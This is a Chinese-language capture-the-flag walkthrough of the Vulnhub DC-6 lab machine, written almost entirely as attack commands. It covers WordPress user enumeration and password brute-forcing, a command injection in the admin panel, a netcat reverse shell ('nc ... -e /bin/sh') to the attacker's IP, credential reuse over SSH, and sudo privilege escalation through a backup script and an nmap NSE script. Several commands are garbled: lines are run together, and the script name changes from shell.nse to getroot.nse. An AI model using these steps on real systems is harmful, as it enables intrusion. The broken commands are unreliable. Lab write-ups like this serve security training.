【Vulnhub】DC-6

nmap 扫描一下

nmap -A -p- 192.168.149.164

vim /etc/hosts

加上 192.168.149.164 wordy

访问 80 端口，发现是一个 wordpress 的站点

用 wpscan 扫描一下，发现了几个用户名

wpscan --url http://wordy -ru

在靶机下载的页面，根据作者善意提醒，制作一份密码字典

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

把扫描出来的用户名也保存出来，爆破一下

wpscan --url http://wordy -U users.txt -P passwords.txt

找到账户密码：mark/helpdesk01

登录后，后台的一个工具里面有个功能，存在命令执行漏洞

用 burp 抓一下包，看一下，在后面加上个 ;ls 成功回显了目录下的文件

nc 来拿一个 shell 吧

先 kali 里面 nc -lp 6666

访问的时候加上

; nc 192.168.149.141 6666 -e /bin/sh

python -c "import pty;pty.spawn('/bin/bash')" 

开启一个好看点的 shell

在 mark 的目录下找到了一个用户名和密码 graham/GSo7isUM1D4

这个账户可以直接 ssh 登进来

ssh graham@192.168.149.164

登陆以后，sudo -l 发现一个不需要密码就可以用的

在后面追加一个 /bin/bash，这样运行的时候就能拿到 jens 的 shell 了

echo "/bin/bash" >> /home/jens/backups.shsudo -u jens /home/jens/backups.sh

再找一下，这次是 nmap

可以写个脚本，让 nmap 来执行脚本，然后拿到 shell

echo 'os.execute("/bin/sh")' > shell.nsesudo nmap --script getroot.nse